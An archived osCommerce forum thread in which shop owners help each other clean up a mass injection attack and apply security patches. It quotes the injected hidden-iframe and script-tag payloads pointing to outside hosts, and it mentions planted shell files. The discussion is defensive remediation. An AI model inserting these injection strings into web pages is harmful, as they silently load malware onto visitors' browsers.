Jump to content

Archived

This topic is now archived and is closed to further replies.

stevenchim

Help Please! SOS!

Recommended Posts

Starting from last Saturday there is some additional code disappear on my site..

 

For example, when I receive a e-mail from customer enquiry box.

The title is shown as XXXXXXXX<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>XXX

the script between is added by unknown people.

 

Did anyone have this problem too?

And how can I remove it?

Share this post


Link to post
Share on other sites

You have to find the files where the code was edited and re-edit them. Sometimes there is only one file and sometimes there are hundreds of them. There may also be files added toallow the hacker to continue editing your code. You need to remove all of those files. Once that is done, or before, you need to apply the security changes as mentioned many times a day on these forums. Otherwise the hacker will just come back.

Share this post


Link to post
Share on other sites

Any idea where to start looking at?

 

The first step I do is just searching the key word but no result.

 

Any idea where I should starting look at?

 

The recent change is I change permission of image folder to 777

Share this post


Link to post
Share on other sites

It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.

Share this post


Link to post
Share on other sites

It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.

 

I found ..may be twenty .php file in the image folder, which should not exist in this folder.

I deleted them all and still looking for un-usual file.

Thanks.

Share this post


Link to post
Share on other sites

When I go to the site.

 

Its loads some unknown element like exero.eu, gooqlepic.com, yandekapi.com...etc..

 

Still finding where to remove them~~

Share this post


Link to post
Share on other sites

If you still have the problem it means you haven't removed all of the hacker's code.

If I were you I'd delete the entire site and restore it all from a good backup, provided you have a good backup? If not, I suggest you get a professional to look at your files and cleanse them properly. Like Jack said, you will then have to apply security measures.


~ Don't mistake my kindness for weakness ~

Share this post


Link to post
Share on other sites

My site got hacked as this way too.

You need to erase injected codes on your database.

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x.

 

The site works now but I wonder how it's possible to make sure this won't be happen again. Any patch released?

Share this post


Link to post
Share on other sites

My site got hacked as this way too.

You need to erase injected codes on your database.

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x.

 

The site works now but I wonder how it's possible to make sure this won't be happen again. Any patch released?

 

Thanks for your imformation.

I have looked into the database, but it seems fine for me.

I cant find any <iframe> tags in the database :(

Share this post


Link to post
Share on other sites

Hi there,

 

we have the same problem. We've been infected with this:

 

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

 

It was in the 'configuration_value' field from the 'configuration' table, in the first record just where 'Store_name' is. We've been able to clean the database and now it is fine but we don't know what to do. We assume this an oscommerce bug but, which version is safe? Do we have to upgrade from 2.2RC2 to 2.3.1? Is this bug in the new ones too?

 

thanks

Share this post


Link to post
Share on other sites

If you are using version 2.2, make sure you apply ALL the security measures described here: http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

 

Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1.


~ Don't mistake my kindness for weakness ~

Share this post


Link to post
Share on other sites

If you are using version 2.2, make sure you apply ALL the security measures described here: http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

 

Version 2.3.1 has fixed a lot of security bugs, upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly worked on to work on 2.3.1.

 

Ok, working on it. We'll report further problems.

Share this post


Link to post
Share on other sites

Those are not injected in the database, but inside the text defines of your site (at least in the ones we analyzed).

So a grep for that keyword should find the where they are...

 

This scanner should tell you if your site is hacked: http://sitecheck.sucuri.net

Share this post


Link to post
Share on other sites

Our site got hacked as well.

It was injected in the DB (config values).

Only removing it from the database wont help long, you have to update the security.

We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successfull attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;)

 

Oh, we have 2.2, so dont think u have to update the whole system, i wouldnt take that pain...

 

Feel free to contact u for help.

Share this post


Link to post
Share on other sites

Our site got hacked as well.

It was injected in the DB (config values).

Only removing it from the database wont help long, you have to update the security.

We followed the steps on the above mentioned secure oscommerce thread and installed osc_sec package r8. Since then, no more successfull attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;)

 

Oh, we have 2.2, so dont think u have to update the whole system, i wouldnt take that pain...

 

Feel free to contact u for help.

 

So which table(s) of DB is affected?

Share this post


Link to post
Share on other sites

Steven

 

Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands.

 

You need to also patch your sites security as is listed in most of the discussions in this part of the forums.

 

That is assuming you are at least using a recent version of osCommerce.

 

Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, its best then to just upgrade to 2.3.1. Pound for pound its no different in terms of time and energy to fixed a heavily hacked up website as it is to transfer to the latest version of osCommerce.

 

I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can reek on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products.

 

Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1

 

Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does.

 

If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

Steven

 

Basically if your site is not patched against the known exploit hole in the admin area that was reported last year then removing all the hack code will be no different than trying to push the tide out with your hands.

 

You need to also patch your sites security as is listed in most of the discussions in this part of the forums.

 

That is assuming you are at least using a recent version of osCommerce.

 

Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, its best then to just upgrade to 2.3.1. Pound for pound its no different in terms of time and energy to fixed a heavily hacked up website as it is to transfer to the latest version of osCommerce.

 

I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can reek on a website, match that to the week it would take you to rebuild your site on 2.3.1 and import your products.

 

Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1

 

Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does.

 

If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2,5 & 6 - the rest being optional extras that can help improve security as well.

 

Thank you very much for the advice. I will try to see what I can do.

 

As we all know the shop name is changed like every 5 hours.

Yesterday I have deleted the file manager php file from admin.

And now it seems fine.

Share this post


Link to post
Share on other sites

Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there.

Thank you for your useful information.

Looks like "1see.ir/j/" is improved version of "exero".

It infects not only configuration. "1see.ir/j/" is able to be injected to each text field of the database.

Here it is the free script for removal "1see.ir/j/":

http://www.greatis.com/security/1see-ir-infection-removal.htm

Share this post


Link to post
Share on other sites

after I did all the actions mentioned above..

the site is ok for the last few days..

but today comes to something new

 

(shop name)</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>

 

sign...

Share this post


Link to post
Share on other sites

Steven,

 

Your site is vulnerable to hacker attacks and needs to be cleaned and secured to prevent injection attacks like that.

 

 

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Steven did you give osC_Sec a try in the end?


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

×